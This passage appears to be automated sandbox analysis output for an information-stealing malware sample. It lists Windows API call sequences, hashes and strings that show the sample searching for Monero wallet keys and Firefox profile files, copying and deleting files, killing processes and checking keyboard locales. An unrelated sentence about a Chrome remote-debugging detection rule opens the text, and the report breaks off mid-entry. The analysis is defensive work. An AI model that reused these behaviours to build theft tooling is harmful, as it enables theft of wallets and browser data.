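`--profile-directory` on its own is normal (every Chromium child process carries it), so the rule keys only on the debugging switches and reports the profile as context; the parent check is what separates a developer's own `chrome --remote-debugging-port` from a launch by an unknown binary.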
                                        APIs
                                        • wsprintfA.USER32 ref: 00193B1C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00193B33
                                        • lstrcat.KERNEL32(?,?), ref: 00193B85
                                        • StrCmpCA.SHLWAPI(?,001A0F58), ref: 00193B97
                                        • StrCmpCA.SHLWAPI(?,001A0F5C), ref: 00193BAD
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00193EB7
                                        • FindClose.KERNEL32(000000FF), ref: 00193ECC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: 38e1b2b983c677409b123c00e579398a52d68e1712dbc9937b4767c1132cc608
                                        • Instruction ID: cf7fb89ddbeefaab6e01fa8d293c4b784d24636c1a534fc409f20fb9b8f643e6
                                        • Opcode Fuzzy Hash: 38e1b2b983c677409b123c00e579398a52d68e1712dbc9937b4767c1132cc608
                                        • Instruction Fuzzy Hash: 62A13072A00208ABDF24DFA4DC85FEE7379BB59701F444598F61E96181EB70AB84CF61
                                        APIs
                                        • wsprintfA.USER32 ref: 00194B7C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00194B93
                                        • StrCmpCA.SHLWAPI(?,001A0FC4), ref: 00194BC1
                                        • StrCmpCA.SHLWAPI(?,001A0FC8), ref: 00194BD7
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00194DCD
                                        • FindClose.KERNEL32(000000FF), ref: 00194DE2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: f1ac76fd45e3905b6ba6e070806418f91cd63f749c5d7ac6ccf5962099e7cc85
                                        • Instruction ID: 9fc321038c3832f721794bd2fc9cd3d33d42431a40d4ba15bb9309ca82b79411
                                        • Opcode Fuzzy Hash: f1ac76fd45e3905b6ba6e070806418f91cd63f749c5d7ac6ccf5962099e7cc85
                                        • Instruction Fuzzy Hash: 11614976900218ABCF24EBA0EC45FEA737CBB59701F4045D8F60996151EB70EB89CF95
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001947D0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 001947D7
                                        • wsprintfA.USER32 ref: 001947F6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 0019480D
                                        • StrCmpCA.SHLWAPI(?,001A0FAC), ref: 0019483B
                                        • StrCmpCA.SHLWAPI(?,001A0FB0), ref: 00194851
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 001948DB
                                        • FindClose.KERNEL32(000000FF), ref: 001948F0
                                        • lstrcat.KERNEL32(?,011CE928), ref: 00194915
                                        • lstrcat.KERNEL32(?,011CD660), ref: 00194928
                                        • lstrlen.KERNEL32(?), ref: 00194935
                                        • lstrlen.KERNEL32(?), ref: 00194946
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: af8ae7b2573ca1537df8194735f56f9a705e103f8720d463926f223034c0ac5d
                                        • Instruction ID: 3981bfd326445ad4bc20c886f44dd031b7de5665eca0bdda159db3f3ee4f0507
                                        • Opcode Fuzzy Hash: af8ae7b2573ca1537df8194735f56f9a705e103f8720d463926f223034c0ac5d
                                        • Instruction Fuzzy Hash: 3B517671904208ABCB24EB70EC89FED737CAB58301F4045E8F64A96151EB70DB85CF95
                                        APIs
                                        • wsprintfA.USER32 ref: 00194113
                                        • FindFirstFileA.KERNEL32(?,?), ref: 0019412A
                                        • StrCmpCA.SHLWAPI(?,001A0F94), ref: 00194158
                                        • StrCmpCA.SHLWAPI(?,001A0F98), ref: 0019416E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 001942BC
                                        • FindClose.KERNEL32(000000FF), ref: 001942D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 180737720-4073750446
                                        • Opcode ID: 9a216a689a3b7d67b8dbdd2c5c6975bb7871fa3fa92300214e02ce65b6df2eae
                                        • Instruction ID: ec8795819df628cfd283a680f1c51d236d477cef6ede7db05ee95185529776d4
                                        • Opcode Fuzzy Hash: 9a216a689a3b7d67b8dbdd2c5c6975bb7871fa3fa92300214e02ce65b6df2eae
                                        • Instruction Fuzzy Hash: D95178B2504218ABCF24EBB0DC45EEE737CBB58301F4045E8B60A96051DB70EB89CF94
                                        APIs
                                        • wsprintfA.USER32 ref: 0018EE3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 0018EE55
                                        • StrCmpCA.SHLWAPI(?,001A1630), ref: 0018EEAB
                                        • StrCmpCA.SHLWAPI(?,001A1634), ref: 0018EEC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0018F3AE
                                        • FindClose.KERNEL32(000000FF), ref: 0018F3C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: eb29c45f5c07e6705fa1dcd0af55d3ee6be8cb1075fcbbfe42bd7453b4c97c1d
                                        • Instruction ID: f16bc6e0eeb787eba461d8ebc69716348b569a104537a39d8cfbb841c338a7f0
                                        • Opcode Fuzzy Hash: eb29c45f5c07e6705fa1dcd0af55d3ee6be8cb1075fcbbfe42bd7453b4c97c1d
                                        • Instruction Fuzzy Hash: 91E1DD729111189ADF54FB60DDA2EEE7379AF64300F8045E9B50B66092EF306B8DCF91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                        • API String ID: 0-1562099544
                                        • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction ID: 07a724bf9b30352eb69f79812a93cd11989686a9540e04375399aa31d7a75ebb
                                        • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction Fuzzy Hash: 9FE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001A16B0,001A0D97), ref: 0018F81E
                                        • StrCmpCA.SHLWAPI(?,001A16B4), ref: 0018F86F
                                        • StrCmpCA.SHLWAPI(?,001A16B8), ref: 0018F885
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0018FBB1
                                        • FindClose.KERNEL32(000000FF), ref: 0018FBC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: fc9c2922d0162f05a5c2957f887f2333d1a1f9dcde29ddcac2f7fe648a73cd07
                                        • Instruction ID: ea8e293697da086d26f7954f3689974bec344524a14ac3be895e7600c79cb3e1
                                        • Opcode Fuzzy Hash: fc9c2922d0162f05a5c2957f887f2333d1a1f9dcde29ddcac2f7fe648a73cd07
                                        • Instruction Fuzzy Hash: 0AB1F072A001189BCF24FF64DD96AEE7379AF65300F4085A8A50A57191EF30AB4DCFD6
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001A523C,?,?,?,001A52E4,?,?,00000000,?,00000000), ref: 00181963
                                        • StrCmpCA.SHLWAPI(?,001A538C), ref: 001819B3
                                        • StrCmpCA.SHLWAPI(?,001A5434), ref: 001819C9
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00181D80
                                        • DeleteFileA.KERNEL32(00000000), ref: 00181E0A
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00181E60
                                        • FindClose.KERNEL32(000000FF), ref: 00181E72
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: d8dede45fb1eac220a38f2a9d99cfcb77046e294211926439a38aa0cf32e9dbb
                                        • Instruction ID: f33793ade995cf1ffe1fc2d1a4e2bb96d8dc09274d152c8929c05982646cb1d9
                                        • Opcode Fuzzy Hash: d8dede45fb1eac220a38f2a9d99cfcb77046e294211926439a38aa0cf32e9dbb
                                        • Instruction Fuzzy Hash: 5712C0729141189BCF15FB60CCA6AEE7379AF65300F8045D9B50B66091EF306B8DCF91
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,001A0C32), ref: 0018DF5E
                                        • StrCmpCA.SHLWAPI(?,001A15C0), ref: 0018DFAE
                                        • StrCmpCA.SHLWAPI(?,001A15C4), ref: 0018DFC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0018E4E0
                                        • FindClose.KERNEL32(000000FF), ref: 0018E4F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        • Opcode ID: f90353c5aee2f1751c980c18464c89d3518eebe8b4729d30bb6cae809da382fc
                                        • Instruction ID: cfc62d30287167b6fb3efba7828ab727bb76cbcf10dc41f0cd601fec7d3ab0a6
                                        • Opcode Fuzzy Hash: f90353c5aee2f1751c980c18464c89d3518eebe8b4729d30bb6cae809da382fc
                                        • Instruction Fuzzy Hash: ABF189719141189ACF29FB60DDA6EEE7379BF65300F8045E9A10B62091EF306B8DCF95
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001A15A8,001A0BAF), ref: 0018DBEB
                                        • StrCmpCA.SHLWAPI(?,001A15AC), ref: 0018DC33
                                        • StrCmpCA.SHLWAPI(?,001A15B0), ref: 0018DC49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0018DECC
                                        • FindClose.KERNEL32(000000FF), ref: 0018DEDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: 4e76ae1226e8d86ff57c16858c884e214542d36f4cdc071bea9f12548a538041
                                        • Instruction ID: 7eae528f83f1a8bc47c4257237effa50959e096390384deb8a1e165b6de257d8
                                        • Opcode Fuzzy Hash: 4e76ae1226e8d86ff57c16858c884e214542d36f4cdc071bea9f12548a538041
                                        • Instruction Fuzzy Hash: 0C91E172A002049BCF14FB74ED569ED737DAFA5340F4046A8B90756181EF34AB4C8BD6
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00199905
                                        • Process32First.KERNEL32(00189FDE,00000128), ref: 00199919
                                        • Process32Next.KERNEL32(00189FDE,00000128), ref: 0019992E
                                        • StrCmpCA.SHLWAPI(?,00189FDE), ref: 00199943
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0019995C
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0019997A
                                        • CloseHandle.KERNEL32(00000000), ref: 00199987
                                        • CloseHandle.KERNEL32(00189FDE), ref: 00199993
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: b52c39f95d38a2b6b6aa25a7ecce09159547fbdffc1b58a45155895e590fe6a4
                                        • Instruction ID: f6e28213a2b7133c9a9781848a039bd15d6274d34f57ce3a1e52000c3b987e9f
                                        • Opcode Fuzzy Hash: b52c39f95d38a2b6b6aa25a7ecce09159547fbdffc1b58a45155895e590fe6a4
                                        • Instruction Fuzzy Hash: F8111C75A04308EBCB24DFA5EC48BDDB7B9AB48705F0045ECF509A6240DB74DA84CF95
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,001A05B7), ref: 00197D71
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00197D89
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00197D9D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00197DF2
                                        • LocalFree.KERNEL32(00000000), ref: 00197EB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
                                        • Opcode ID: e8bae0038d4748474ad9f89c3fac5a585d4c5a02c772c76ba9a8c7aa7f9b10f3
                                        • Instruction ID: 8e75050267e2e6f833d541c903ff2ce5b11c095b6771d5fde4b2ba0be7dfbb84
